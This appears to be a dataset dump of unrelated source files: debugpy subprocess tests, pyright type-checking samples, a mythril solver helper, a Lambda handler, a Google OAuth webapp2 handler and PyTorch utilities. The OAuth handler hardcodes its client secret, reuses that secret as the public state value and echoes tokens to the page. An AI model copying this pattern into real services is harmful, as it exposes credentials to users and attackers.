assert isinstance(foo, Foo), repr(foo)
q.put("child_pid?")
what, child_pid = a.get()
assert what == "child_pid"
backchannel.send(child_pid)
q.put("grandchild_pid?")
what, grandchild_pid = a.get()
assert what == "grandchild_pid"
backchannel.send(grandchild_pid)
assert backchannel.receive() == "continue"
q.put("exit!")
p.join()
def child(q, a):
print("entering child")
assert q.get() == "foo?"
a.put(Foo())
assert q.get() == "child_pid?"
a.put(("child_pid", os.getpid()))
print("spawning child of child")
p = multiprocessing.Process(target=grandchild, args=(q, a))
p.start()
p.join()
print("leaving child")
def grandchild(q, a):
print("entering grandchild")
assert q.get() == "grandchild_pid?"
a.put(("grandchild_pid", os.getpid()))
assert q.get() == "exit!"
print("leaving grandchild")
if __name__ == "__main__":
start_method = sys.argv[1]
if start_method != "":
multiprocessing.set_start_method(start_method)
q = multiprocessing.Queue()
a = multiprocessing.Queue()
try:
parent(q, a)
finally:
q.close()
a.close()
with debug.Session() as parent_session:
parent_backchannel = parent_session.open_backchannel()
with run(parent_session, target(code_to_debug, args=[start_method])):
pass
expected_child_config = expected_subprocess_config(parent_session)
child_config = parent_session.wait_for_next_event("debugpyAttach")
assert child_config == expected_child_config
parent_session.proceed()
with debug.Session(child_config) as child_session:
with child_session.start():
pass
expected_grandchild_config = expected_subprocess_config(child_session)
grandchild_config = child_session.wait_for_next_event("debugpyAttach")
assert grandchild_config == expected_grandchild_config
with debug.Session(grandchild_config) as grandchild_session:
with grandchild_session.start():
pass
parent_backchannel.send("continue")
@pytest.mark.parametrize("subProcess", [True, False, None])
def test_subprocess(pyfile, target, run, subProcess):
@pyfile
def child():
import os
import sys
assert "debugpy" in sys.modules
import debugpy
from debuggee import backchannel
backchannel.send(os.getpid())
backchannel.send(debugpy.__file__)
backchannel.send(sys.argv)
@pyfile
def parent():
import debuggee
import os
import subprocess
import sys
debuggee.setup()
argv = [sys.executable, sys.argv[1], "--arg1", "--arg2", "--arg3"]
env = os.environ.copy()
process = subprocess.Popen(
argv,
env=env,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
process.wait()
with debug.Session() as parent_session:
backchannel = parent_session.open_backchannel()
parent_session.config["preLaunchTask"] = "doSomething"
parent_session.config["postDebugTask"] = "doSomethingElse"
if subProcess is not None:
parent_session.config["subProcess"] = subProcess
with run(parent_session, target(parent, args=[child])):
pass
if subProcess is False:
return
expected_child_config = expected_subprocess_config(parent_session)
child_config = parent_session.wait_for_next_event("debugpyAttach")
assert child_config == expected_child_config
parent_session.proceed()
with debug.Session(child_config) as child_session:
with child_session.start():
pass
child_pid = backchannel.receive()
assert child_pid == child_config["subProcessId"]
assert str(child_pid) in child_config["name"]
debugpy_file = backchannel.receive()
assert debugpy_file == debugpy.__file__
child_argv = backchannel.receive()
assert child_argv == [child, "--arg1", "--arg2", "--arg3"]
def test_autokill(pyfile, target):
@pyfile
def child():
while True:
pass
@pyfile
def parent():
import os
import subprocess
import sys
argv = [sys.executable, sys.argv[1]]
env = os.environ.copy()
subprocess.Popen(
argv,
env=env,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
).wait()
with debug.Session() as parent_session:
parent_session.expected_exit_code = some.int
with parent_session.launch(target(parent, args=[child])):
pass
child_config = parent_session.wait_for_next_event("debugpyAttach")
parent_session.proceed()
with debug.Session(child_config) as child_session:
with child_session.start():
pass
parent_session.request("terminate")
child_session.wait_for_exit()
def test_argv_quoting(pyfile, target, run):
@pyfile
def args():
args = [ # noqa
r"regular",
r"",
r"with spaces" r'"quoted"',
r'" quote at start',
r'quote at end "',
r'quote in " the middle',
r'quotes "in the" middle',
r"\path with\spaces",
r"\path\with\terminal\backslash" + "\\",
r"backslash \" before quote",
]
@pyfile
def parent():
import debuggee
import sys
import subprocess
from args import args
debuggee.setup()
child = sys.argv[1]
subprocess.check_call([sys.executable] + [child] + args)
@pyfile
def child():
import sys
from debuggee import backchannel
from args import args as expected_args
backchannel.send(expected_args)
actual_args = sys.argv[1:]
backchannel.send(actual_args)
with debug.Session() as parent_session:
backchannel = parent_session.open_backchannel()
with run(parent_session, target(parent, args=[child])):
pass
child_config = parent_session.wait_for_next_event("debugpyAttach")
parent_session.proceed()
with debug.Session(child_config) as child_session:
with child_session.start():
pass
expected_args = backchannel.receive()
actual_args = backchannel.receive()
assert expected_args == actual_args
def test_echo_and_shell(pyfile, target, run):
"""
Checks https://github.com/microsoft/ptvsd/issues/1548
"""
@pyfile
def code_to_run():
import debuggee
import sys
import subprocess
import os
debuggee.setup()
if sys.platform == "win32":
args = ["dir", "-c", "."]
else:
args = ["ls", "-c", "-la"]
p = subprocess.Popen(
args,
shell=True,
stderr=subprocess.STDOUT,
stdout=subprocess.PIPE,
cwd=os.path.dirname(os.path.abspath(__file__)),
)
stdout, _stderr = p.communicate()
if sys.version_info[0] >= 3:
stdout = stdout.decode("utf-8")
if "code_to_run.py" not in stdout:
raise AssertionError(
'Did not find "code_to_run.py" when listing this dir with subprocess. Contents: %s'
% (stdout,)
)
with debug.Session() as parent_session:
with run(parent_session, target(code_to_run)):
pass
```
#### File: tests/debugpy/test_path_mapping.py
```python
from __future__ import absolute_import, division, print_function, unicode_literals
import pytest
import tests
from tests import debug, test_data
from tests.debug import targets
from tests.patterns import some
if not tests.full:
@pytest.fixture(params=targets.all_named)
def target(request):
return request.param
def test_with_dot_remote_root(pyfile, long_tmpdir, target, run):
@pyfile
def code_to_debug():
import os
import debuggee
from debuggee import backchannel
debuggee.setup()
backchannel.send(os.path.abspath(__file__))
print("done") # @bp
dir_local = long_tmpdir.mkdir("local")
dir_remote = long_tmpdir.mkdir("remote")
path_local = dir_local / "code_to_debug.py"
path_remote = dir_remote / "code_to_debug.py"
code_to_debug.copy(path_local)
code_to_debug.copy(path_remote)
with debug.Session() as session:
session.config["pathMappings"] = [{"localRoot": dir_local, "remoteRoot": "."}]
backchannel = session.open_backchannel()
with run(session, target(path_remote), cwd=dir_remote):
# Set breakpoints using local path. This tests that local paths are
# mapped to remote paths.
session.set_breakpoints(path_local, all)
actual_path_remote = backchannel.receive()
assert some.path(actual_path_remote) == path_remote
session.wait_for_stop(
"breakpoint",
expected_frames=[some.dap.frame(some.dap.source(path_local), line="bp")],
)
session.request_continue()
def test_with_path_mappings(pyfile, long_tmpdir, target, run):
@pyfile
def code_to_debug():
import debuggee
import os
import sys
from debuggee import backchannel
debuggee.setup()
backchannel.send(os.path.abspath(__file__))
call_me_back_dir = backchannel.receive()
sys.path.insert(0, call_me_back_dir)
import call_me_back
def call_func():
print("break here") # @bp
call_me_back.call_me_back(call_func) # @call_me_back
print("done")
dir_local = long_tmpdir.mkdir("local")
dir_remote = long_tmpdir.mkdir("remote")
path_local = dir_local / "code_to_debug.py"
path_remote = dir_remote / "code_to_debug.py"
code_to_debug.copy(path_local)
code_to_debug.copy(path_remote)
call_me_back_dir = test_data / "call_me_back"
call_me_back_py = call_me_back_dir / "call_me_back.py"
with debug.Session() as session:
session.config["pathMappings"] = [
{"localRoot": dir_local, "remoteRoot": dir_remote}
]
backchannel = session.open_backchannel()
with run(session, target(path_remote)):
# Set breakpoints using local path. This tests that local paths are
# mapped to remote paths.
session.set_breakpoints(path_local, ["bp"])
actual_path_remote = backchannel.receive()
assert some.path(actual_path_remote) == path_remote
backchannel.send(call_me_back_dir)
stop = session.wait_for_stop(
"breakpoint",
expected_frames=[
some.dap.frame(
# Mapped files should not have a sourceReference, so that the IDE
# doesn't try to fetch them instead of opening the local file.
some.dap.source(path_local, sourceReference=0),
line="bp",
),
some.dap.frame(
# Unmapped files should have a sourceReference, since there's no
# local file for the IDE to open.
some.dap.source(
call_me_back_py, sourceReference=some.int.not_equal_to(0)
),
line="callback",
),
some.dap.frame(
# Mapped files should not have a sourceReference, so that the IDE
# doesn't try to fetch them instead of opening the local file.
some.dap.source(path_local, sourceReference=0),
line="call_me_back",
),
],
)
srcref = stop.frames[1]["source"]["sourceReference"]
try:
session.request("source", {"sourceReference": 0})
except Exception as exc:
assert "Source unavailable" in str(exc)
else:
pytest.fail("sourceReference=0 should not be valid")
source = session.request("source", {"sourceReference": srcref})
assert "def call_me_back(callback):" in source["content"]
session.request_continue()
```
#### File: debugpy/tests/__init__.py
```python
from __future__ import absolute_import, division, print_function, unicode_literals
"""debugpy tests
"""
import os
import pkgutil
import py
import pytest
# Do not import anything from debugpy until assert rewriting is enabled below!
full = int(os.environ.get("DEBUGPY_TESTS_FULL", "0")) != 0
root = py.path.local(__file__) / ".."
test_data = root / "test_data"
"""A py.path.local object for the tests/test_data/ directory.
Idiomatic use is via from .. import::
from tests import test_data
f = open(str(test_data / "attach" / "attach1.py"))
"""
# This is only imported to ensure that the module is actually installed and the
# timeout setting in pytest.ini is active, since otherwise most timeline-based
# tests will hang indefinitely if they time out.
import pytest_timeout # noqa
# We want pytest to rewrite asserts (for better error messages) in the common code
# code used by the tests, and in all the test helpers. This does not affect debugpy
# inside debugged processes.
def _register_assert_rewrite(modname):
modname = str(modname)
# print("pytest.register_assert_rewrite({0!r})".format(modname))
pytest.register_assert_rewrite(modname)
_register_assert_rewrite("debugpy.common")
tests_submodules = pkgutil.iter_modules([str(root)])
for _, submodule, _ in tests_submodules:
submodule = str("{0}.{1}".format(__name__, submodule))
_register_assert_rewrite(submodule)
# Now we can import these, and pytest will rewrite asserts in them.
from debugpy.common import json, log
import debugpy.server # noqa
# Enable full logging to stderr, and make timestamps shorter to match maximum test
# run time better.
log.stderr.levels = all
log.timestamp_format = "06.3f"
log.to_file(prefix="tests")
# Enable JSON serialization for py.path.local.
def json_default(self, obj):
if isinstance(obj, py.path.local):
return obj.strpath
return self.original_default(obj)
json.JsonEncoder.original_default = json.JsonEncoder.default
json.JsonEncoder.default = json_default
``` |
{
"source": "jhutchings1/mythril",
"score": 2
} |
#### File: mythril/support/model.py
```python
from functools import lru_cache
from z3 import sat, unknown
from mythril.support.support_args import args
from mythril.laser.smt import Optimize
from mythril.laser.ethereum.time_handler import time_handler
from mythril.exceptions import UnsatError
import logging
log = logging.getLogger(__name__)
# LRU cache works great when used in powers of 2
@lru_cache(maxsize=2 ** 23)
def get_model(constraints, minimize=(), maximize=(), enforce_execution_time=True):
"""
Returns a model based on given constraints as a tuple
:param constraints: Tuple of constraints
:param minimize: Tuple of minimization conditions
:param maximize: Tuple of maximization conditions
:param enforce_execution_time: Bool variable which enforces --execution-timeout's time
:return:
"""
s = Optimize()
timeout = args.solver_timeout
if enforce_execution_time:
timeout = min(timeout, time_handler.time_remaining() - 500)
if timeout <= 0:
raise UnsatError
s.set_timeout(timeout)
for constraint in constraints:
if type(constraint) == bool and not constraint:
raise UnsatError
constraints = [constraint for constraint in constraints if type(constraint) != bool]
for constraint in constraints:
s.add(constraint)
for e in minimize:
s.minimize(e)
for e in maximize:
s.maximize(e)
result = s.check()
if result == sat:
return s.model()
elif result == unknown:
log.debug("Timeout encountered while solving expression using z3")
raise UnsatError
``` |
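As a rough usage sketch (not taken from the repository), `get_model` can be called directly with a tuple of symbolic constraints. The tuple matters because of the `lru_cache` decorator, and `enforce_execution_time` is disabled here since no global execution timer is assumed to be running outside a full analysis.
```python
# Minimal usage sketch for get_model; the constraint symbols are arbitrary and
# enforce_execution_time is disabled because no analysis timer is running here.
from mythril.laser.smt import symbol_factory
from mythril.support.model import get_model
from mythril.exceptions import UnsatError

x = symbol_factory.BitVecSym("x", 256)
lower = symbol_factory.BitVecVal(5, 256)
upper = symbol_factory.BitVecVal(10, 256)

constraints = (x > lower, x < upper)  # a hashable tuple, as required by @lru_cache

try:
    model = get_model(constraints, enforce_execution_time=False)
    print(model)  # a z3 model with a concrete assignment for x
except UnsatError:
    print("constraints are unsatisfiable or the solver timed out")
```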
{
"source": "jhutchings1/pyright",
"score": 3
} |
#### File: tests/samples/callbackPrototype1.py
```python
from typing import Optional, List, Protocol
class Combiner(Protocol):
def __call__(self, *vals: bytes,
maxlen: Optional[int] = None) -> List[bytes]:
return []
def good_cb(*vals: bytes, maxlen: Optional[int] = None) -> List[bytes]:
return []
def bad_cb1(*vals: bytes, maxlen: Optional[int], maxitems: Optional[int]) -> List[bytes]:
return []
def bad_cb2(*vals: bytes) -> List[bytes]:
return []
def bad_cb3(*vals: bytes, maxlen: Optional[str]) -> List[bytes]:
return []
comb: Combiner = good_cb
# This should generate an error because maxitems is unmatched.
comb = bad_cb1
# This should generate an error because maxlen is unmatched.
comb = bad_cb2
# This should generate an error because maxlen is the wrong type.
comb = bad_cb3
```
#### File: tests/samples/dictionary1.py
```python
from typing import Dict
def wantsIntDict(a: Dict[int, int]):
pass
wantsIntDict({3: 3, 5: 5})
wantsIntDict({x: x for x in [2, 3, 4]})
# This should generate an error because
# the type is wrong.
wantsIntDict({'hello': 3, 'bye': 5})
# This should generate an error because
# the type is wrong.
wantsIntDict({'sdf': x for x in [2, 3, 4]})
```
#### File: tests/samples/function1.py
```python
from typing import Callable
#------------------------------------------------------
# Test function type matching
class FooBase:
pass
class Foo(FooBase):
pass
class Bar(Foo):
pass
def needs_function1(callback: Callable[[Foo], Foo]):
pass
def callback1():
pass
def callback2(a: Foo) -> Foo:
return Foo()
def callback3(a: Foo) -> str:
return "1"
def callback4(a: Foo, b: Foo) -> Foo:
return Foo()
def callback5(a: Foo, b: int = 3) -> Foo:
return Foo()
def callback6(*a) -> Foo:
return Foo()
def callback7(a: str) -> Foo:
return Foo()
def callback8(a: Bar) -> Foo:
return Foo()
def callback9(a: FooBase) -> Foo:
return Foo()
# This should generate an error because callback1
# takes no parameters.
needs_function1(callback1)
needs_function1(callback2)
# This should generate an error because the return
# type of callback3 doesn't match.
needs_function1(callback3)
# This should generate an error because callback4
# takes too many parameters.
needs_function1(callback4)
needs_function1(callback5)
needs_function1(callback6)
# This should fail because the parameter is the
# wrong type.
needs_function1(callback7)
# This should fail because the parameter is the
# wrong type.
needs_function1(callback8)
needs_function1(callback9)
```
#### File: tests/samples/function2.py
```python
def func1(a: int, *b: int):
pass
func1(3)
func1(3, 4)
func1(3, *[1, 2, 3])
# This should generate an error
func1(3, 'hello')
# This should generate an error
func1(3, 5, 2, 'str')
# This should generate an error
func1('hello', 3)
# This should generate an error
str_list = ['he', '2', '3']
func1(3, *str_list)
def func2(a: str, **b: int):
pass
func2('hi')
func2('hi', b=3, c=4, d=5)
str_dict = {'a': '3', 'b': '2'}
func2('hi', **str_dict)
# This should generate a type error
func2('hi', 3)
# This should generate a type error
func2('hi', b='hi')
```
#### File: tests/samples/function3.py
```python
def f0(a: int, b: int):
return 3
def f1(a: int, b: int, /):
return 3
# This should generate an error because only one
# '/' parameter is allowed.
def f2(a: int, /, b: int, /):
return 3
def f3(a: int, /, b: int):
return 3
def f4(a: int, /, b: int, *, c: int):
return 3
# This should generate an error because a '/'
# parameter shouldn't appear after '*'.
def f5(a: int, *, b: int, /, c: int):
return 3
def f6(/, a: int, *, b: int):
return 3
f0(2, 3)
f1(2, 3)
# This should generate 1 error because b
# is a position-only parameter.
f1(2, b=3)
# This should generate 2 errors because a and b
# are position-only parameters.
f1(a=2, b=3)
f2(2, 3)
# This should generate an error.
f2(a=2, b=3)
f3(2, 3)
f3(2, b=3)
# This should generate 1 error because a is a
# position-only parameter.
f3(a=2, b=3)
f4(1, 2, c=3)
f4(1, b=2, c=3)
# This should generate an error because c is a
# name-only parameter.
f4(1, 2, 3)
# This should generate an error because a is a
# positional-only parameter.
f4(a=1, b=2, c=3)
# This will generate 2 errors because of the bad
# declaration. Test to make sure we don't crash.
f5(1, b=2, c=3)
f6(1, b=2)
f6(a=1, b=2)
```
#### File: tests/samples/genericTypes6.py
```python
from typing import TypeVar
S = TypeVar('S', str, bytes)
def constrained(first: S, second: S) -> S:
return first
# This should generate an error because the two arguments
# cannot satisfy the 'str' or 'bytes' constraint.
result = constrained('a', b'abc')
T = TypeVar('T')
def unconstrained(first: T, second: T) -> T:
return first
# This shouldn't generate an error because the TypeVar matching
# logic is free to expand the type to a union of 'str' and 'bytes'.
result = unconstrained('a', b'abc')
```
#### File: tests/samples/genericTypes8.py
```python
from typing import TypeVar, Callable
T = TypeVar('T')
U = TypeVar('U')
V = TypeVar('V')
def compose2(f: Callable[[T], U], g: Callable[[U], V]) -> Callable[[T], V]:
def composition(x: T) -> V:
return g(f(x))
return composition
def add_one(x: int) -> int:
return x + 1
def make_str(x: int) -> str:
return str(x)
add_two: Callable[[int], str] = compose2(add_one, make_str)
```
#### File: tests/samples/genericTypes9.py
```python
import pathlib
import shutil
from typing import TypeVar
class Foo:
pass
class Bar(Foo):
pass
X = TypeVar("X", Foo, str)
B = TypeVar("B", bound=Foo)
def test1(x: X) -> X:
return x
def test2(x: B) -> B:
return x
# This should generate an error because test1(Bar())
# should evaluate to type Foo, not Bar.
aa1: Bar = test1(Bar())
aa2: Foo = test1(Bar())
bb1: Bar = test2(Bar())
bb2: Foo = test2(Bar())
# The call to rmtree should not generate any errors.
data_dir = pathlib.Path("/tmp")
archive_path = data_dir / "hello"
shutil.rmtree(archive_path)
```
#### File: tests/samples/operators2.py
```python
from datetime import datetime
def requires_bool(val: bool):
pass
date1 = datetime.now()
date2 = datetime.now()
date3 = datetime.now()
foo1 = date1 < date2 <= date3
requires_bool(foo1)
int1 = 3
foo2 = 2 < int1 < 5
requires_bool(foo2)
# This should generate an error because
# int and datetime cannot be compared.
foo3 = date1 < date2 < 3
```
#### File: tests/samples/overload1.py
```python
from typing import overload, Optional
from datetime import datetime, timezone, timedelta
@overload
def from_json_timestamp(ts: int) -> datetime:
...
@overload
def from_json_timestamp(ts: None) -> None:
...
def from_json_timestamp(ts: Optional[int]) -> Optional[datetime]:
return None if ts is None else (datetime(1970, 1, 1, tzinfo=timezone.utc) + timedelta(milliseconds=ts))
result1: datetime = from_json_timestamp(2418049)
# This should generate an error
result2: datetime = from_json_timestamp(None)
result3: None = from_json_timestamp(None)
# This should generate an error
result4: None = from_json_timestamp(2345)
```
#### File: tests/samples/private1.py
```python
from .private2 import TestClass, _TestClass
_Test = 1
class Foo(object):
_my_var1 = 1
_my_var2 = _my_var1
def foo(self):
a = _Test
return self._my_var1
# This should generate an error
a = _TestClass()
b = TestClass()
# This should generate an error
c = b.__priv1
d = Foo()
# This should generate an error
e = d._my_var1
f = _Test
class TestSubclass(TestClass):
def blah(self):
return self._prot1
def blah2(self):
# This should generate an error
return self.__priv1
```
#### File: tests/samples/protocol1.py
```python
from typing import TypeVar, Protocol
T = TypeVar('T')
T_co = TypeVar('T_co', covariant=True)
T_contra = TypeVar('T_contra', contravariant=True)
class Box(Protocol[T_co]):
def content(self) -> T_co:
...
box: Box[float]
second_box: Box[int]
# This should not generate an error due to the covariance of 'Box'.
box = second_box
class Sender(Protocol[T_contra]):
def send(self, data: T_contra) -> int:
...
sender: Sender[float]
new_sender: Sender[int]
# This should not generate an error because 'Sender' is contravariant.
new_sender = sender
class Proto(Protocol[T]):
attr: T
class NotProto2:
attr: int
var: Proto[float]
another_var: Proto[int]
# This should generate an error because T is invariant.
var = another_var
another_var2: NotProto2
# This should generate an error because T is invariant.
var = another_var2
```
#### File: tests/samples/protocol2.py
```python
from typing import TypeVar, Protocol
T = TypeVar("T")
StrLike = TypeVar("StrLike", str, bytes)
T_contra = TypeVar("T_contra", contravariant=True)
class Writer(Protocol[T_contra]):
def write(self, data: T_contra) -> None:
...
class WriteFile:
def write(self, s: bytes) -> None:
pass
def f(writer: Writer[bytes]):
pass
def g(writer: Writer[T]):
pass
def h(writer: Writer[StrLike]):
pass
w = WriteFile()
f(w)
g(w)
h(w)
```
#### File: tests/samples/protocol3.py
```python
from typing import Protocol
class Foo1(Protocol):
@property
def batch_shape(self) -> int:
return 0
class MockFoo1:
def __init__(self, batch_shape: int):
self._batch_shape = batch_shape
@property
def batch_shape(self) -> int:
return self._batch_shape
# This should not generate an error.
d: Foo1 = MockFoo1(batch_shape=1)
class Foo2(Protocol):
@property
def batch_shape(self) -> int:
return 0
class MockFoo2:
def __init__(self, batch_shape: int):
self._batch_shape = batch_shape
@property
def batch_shape(self) -> float:
return self._batch_shape
# This should generate an error because the
# type of the batch_shape property is not compatible.
e: Foo2 = MockFoo2(batch_shape=1)
```
#### File: tests/samples/typeAlias3.py
```python
from typing import Tuple, Optional, TypeVar
T = TypeVar('T')
ValidationResult = Tuple[bool, Optional[T]]
def foo() -> ValidationResult[str]:
return False, 'valid'
``` |
{
"source": "jhutchings1/transfer-coronavirus-data-service",
"score": 2
} |
#### File: jhutchings1/transfer-coronavirus-data-service/lambda_handler.py
```python
import os
import serverless_wsgi
from main import app
import config
def web_app(event, context):
"""Lambda handler entry point for web app.
:param event: An event from an ALB
:param context: An AWS context object
:returns: An AWS ALB event
:rtype: dict
"""
return run(event, context)
def admin(event, context):
"""Lambda handler entry point for admin app.
Adds the ADMIN environment variable which enables
the user-admin flask routes.
Ensures correct user management: admin users cannot upload or download objects from S3
but do have permission to edit the cognito pool.
:param event: An event from an ALB
:param context: An AWS context object
:returns: An AWS ALB event
:rtype: dict
"""
os.environ["ADMIN"] = "true"
return run(event, context)
def run(event, context):
config.load_environment(app)
config.setup_talisman(app)
config.load_ssm_parameters(app)
return serverless_wsgi.handle_request(app, event, context)
``` |
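The two handlers above differ only in whether the `ADMIN` flag is set before delegating to `serverless_wsgi`. A minimal local smoke test is sketched below; the ALB-style event and the fake context object are illustrative assumptions, not the exact payload AWS sends.
```python
# Hypothetical local smoke test for the Lambda entry points above.
# The event below is a pared-down ALB request; real ALB events carry more fields.
import lambda_handler  # assumes the module above is importable

fake_alb_event = {
    "requestContext": {"elb": {"targetGroupArn": "arn:aws:elasticloadbalancing:placeholder"}},
    "httpMethod": "GET",
    "path": "/",
    "queryStringParameters": {},
    "headers": {"host": "localhost", "x-forwarded-proto": "https"},
    "body": "",
    "isBase64Encoded": False,
}

class FakeContext:
    """Stand-in for the AWS Lambda context object."""
    function_name = "web_app"
    memory_limit_in_mb = 128

if __name__ == "__main__":
    response = lambda_handler.web_app(fake_alb_event, FakeContext())
    print(response["statusCode"])
```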
{
"source": "JHutter/Notemaker-API",
"score": 3
} |
#### File: JHutter/Notemaker-API/oauth.py
```python
import webapp2
from google.appengine.api import urlfetch
from urllib import urlencode
import json
import logging
client = '387463041973-2j1noh0p0danoujlobm20q9378375b0n.apps.googleusercontent.com'
secret_str = '<KEY>' ## don't do this in production, guys
oauth_redir = 'https://final-project-496-400.appspot.com/oauth'
class MainPage(webapp2.RequestHandler):
def get(self):
base = 'https://accounts.google.com/o/oauth2/v2/auth?'
client_id = 'client_id='+client
redir = '&redirect_uri=' + oauth_redir
scope = '&scope=email'
response = '&response_type=code'
secret = '&state=' + secret_str
url = base + client_id + redir + scope + response + secret
jstext = '<script type="text/javascript"> document.getElementById("signinButton").addEventListener("click", function(){ window.location = encodeURI("' + url + '");}); </script>'
# write the response
self.response.headers['Content-Type'] = 'text/html'
self.response.write('<!doctype html><html lang="en"><head><meta charset="utf-8"><title>Final Project</title></head><body><p>Retrieve a token to use with final-project-496-400 API</p><button id="signinButton">Sign in with Google</button>' + jstext + '</body></html>');
class OauthHandler(webapp2.RequestHandler):
def get(self):
# source: http://webapp2.readthedocs.io/en/latest/guide/request.html
code_value = self.request.get('code')
secret_value = self.request.get('state')
self.response.headers['Content-Type'] = 'text/plain'
server_secret = secret_str
# here should be a check that the secret in the get redir'ed from google matches the secret we have on our app's server
if (secret_value != server_secret):
self.response.write('That wasn\'t a very good secret. The secrets don\'t match.')
else:
# post to google
# source: https://cloud.google.com/appengine/docs/standard/python/issue-requests
try:
# put secret, client, etc in here
form_fields = {
'code': code_value,
'client_id': client,
'client_secret': server_secret,
'redirect_uri': oauth_redir,
'grant_type': 'authorization_code',
'access_type': 'offline'}
post_data = urlencode(form_fields)
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
result = urlfetch.fetch(url = 'https://www.googleapis.com/oauth2/v4/token', payload = post_data, method = urlfetch.POST, headers = headers)
# parse the stuff we got
jsonresults = json.loads(result.content)
access_token = jsonresults['access_token']
token_type = jsonresults['token_type']
expires_in = jsonresults['expires_in']
id_token = jsonresults['id_token']
self.response.write(jsonresults)
# now get stuff from google plus, with token as header
try:
# get it there
url = 'https://www.googleapis.com/plus/v1/people/me'
auth = {'Authorization': 'Bearer ' + access_token}
# check what we got back
result = urlfetch.fetch(url, headers=auth)
if result.status_code == 200:
# if the status code says we're good, process the result
usercontent = json.loads(result.content)
self.response.write('\n\n')
self.response.write(usercontent)
# if (usercontent['isPlusUser'] == True):
# name = usercontent['displayName']
# plusurl = usercontent['url']
# # display to user
# self.response.write('Hey, I know you. You\'re ' + name)
# self.response.write('\nAnd your google plus url is ' + plusurl)
# self.response.write('\n\nSecret ' + secret_value + ' used to get this information.')
# else:
# #name = usercontent
# self.response.write('You aren\'t a google plus user, so you don\'t have a url for google plus, and I don\'t have your name.')
# self.response.write('\n\nSecret ' + secret_value + ' used to get this information.')
else:
self.response.write('Error: status code ' + str(result.status_code))
except urlfetch.Error:
logging.exception('Caught exception fetching url')
except urlfetch.Error:
logging.exception('Caught exception fetching url')
# source: http://webapp2.readthedocs.io/en/latest/guide/routing.html
app = webapp2.WSGIApplication([
(r'/oauth', OauthHandler),
(r'/.*', MainPage)
], debug=True)
``` |
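The handler above assembles the Google authorization URL by concatenating strings, which works but is easy to break when a value needs escaping. A small sketch of the same URL built with `urlencode` follows; the client id, redirect URI, and state are placeholders, and the import line differs between Python 2 (as used by the webapp2 handler) and Python 3.
```python
from urllib.parse import urlencode  # Python 2 equivalent: from urllib import urlencode

# Placeholder values -- substitute the real client id, redirect URI and state token.
CLIENT_ID = "example-client-id.apps.googleusercontent.com"
REDIRECT_URI = "https://example.appspot.com/oauth"
STATE = "opaque-anti-csrf-token"

def build_auth_url():
    """Return the Google OAuth2 authorization URL with properly escaped parameters."""
    params = {
        "client_id": CLIENT_ID,
        "redirect_uri": REDIRECT_URI,
        "scope": "email",
        "response_type": "code",
        "state": STATE,
    }
    return "https://accounts.google.com/o/oauth2/v2/auth?" + urlencode(params)

if __name__ == "__main__":
    print(build_auth_url())
```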
{
"source": "JHUVisionLab/multi-modal-regression",
"score": 2
} |
#### File: JHUVisionLab/multi-modal-regression/helperFunctions.py
```python
import numpy as np
import re
from scipy.spatial.distance import cdist
import torch
from torch.optim import Optimizer
__all__ = ['classes', 'eps', 'parse_name', 'rotation_matrix', 'get_gamma', 'get_accuracy']
# object categories of interest
classes = ['aeroplane', 'bicycle', 'boat', 'bottle', 'bus', 'car', 'chair', 'diningtable', 'motorbike', 'sofa', 'train', 'tvmonitor']
# numeric precision for my experiments
eps = 1e-6
# parse the name of the image to get model and pose parameters
def parse_name(image_name):
ind = [match.start() for match in re.finditer('_', image_name)]
synset_str = image_name[:ind[0]]
model_str = image_name[ind[0]+1:ind[1]]
az = float(image_name[ind[1]+2:ind[2]])
el = float(image_name[ind[2]+2:ind[3]])
ct = float(image_name[ind[3]+2:ind[4]])
d = float(image_name[ind[4]+2:])
return synset_str, model_str, az, el, ct, d
# get rotation matrix R(az, el, ct) given the three euler angles :
# azimuth az, elevation el, camera-tilt ct
def rotation_matrix(az, el, ct):
ca = np.cos(np.radians(az))
sa = np.sin(np.radians(az))
cb = np.cos(np.radians(el))
sb = np.sin(np.radians(el))
cc = np.cos(np.radians(ct))
sc = np.sin(np.radians(ct))
Ra = np.array([[ca, -sa, 0], [sa, ca, 0], [0, 0, 1]])
Rb = np.array([[1, 0, 0], [0, cb, -sb], [0, sb, cb]])
Rc = np.array([[cc, -sc, 0], [sc, cc, 0], [0, 0, 1]])
R = np.dot(np.dot(Rc, Rb), Ra)
return R
def get_gamma(kmeans_dict):
N = kmeans_dict.shape[0]
D = cdist(kmeans_dict, kmeans_dict, 'sqeuclidean')
d = np.zeros(N)
for i in range(N):
d[i] = np.amin(D[i, np.arange(N) != i])
gamma = 1/(2*np.amin(d))
return gamma
# Implements variation of SGD (optionally with momentum)
class mySGD(Optimizer):
def __init__(self, params, c, alpha1=1e-6, alpha2=1e-8, momentum=0, dampening=0, weight_decay=0, nesterov=False):
defaults = dict(alpha1=alpha1, alpha2=alpha2, momentum=momentum, dampening=dampening, weight_decay=weight_decay, nesterov=nesterov)
super(mySGD, self).__init__(params, defaults)
self.c = c
def __setstate__(self, state):
super(mySGD, self).__setstate__(state)
for group in self.param_groups:
group.setdefault('nesterov', False)
def step(self, closure=None):
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
weight_decay = group['weight_decay']
momentum = group['momentum']
dampening = group['dampening']
nesterov = group['nesterov']
for p in group['params']:
if p.grad is None:
continue
d_p = p.grad.data
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
state['step'] += 1
if weight_decay != 0:
d_p.add_(weight_decay, p.data)
if momentum != 0:
param_state = self.state[p]
if 'momentum_buffer' not in param_state:
buf = param_state['momentum_buffer'] = torch.zeros_like(p.data)
buf.mul_(momentum).add_(d_p)
else:
buf = param_state['momentum_buffer']
buf.mul_(momentum).add_(1 - dampening, d_p)
if nesterov:
d_p = d_p.add(momentum, buf)
else:
d_p = buf
# cyclical learning rate
t = (np.fmod(state['step']-1, self.c)+1)/self.c
if t <= 0.5:
step_size = (1-2*t)*group['alpha1'] + 2*t*group['alpha2']
else:
step_size = 2*(1-t)*group['alpha2'] + (2*t-1)*group['alpha1']
p.data.add_(-step_size, d_p)
return loss
def get_accuracy(ytrue, ypred, num_classes):
# print(ytrue.shape, ypred.shape)
acc = np.zeros(num_classes)
for i in range(num_classes):
acc[i] = np.sum((ytrue == i)*(ypred == i))/np.sum(ytrue == i)
# print(acc)
return np.mean(acc)
``` |
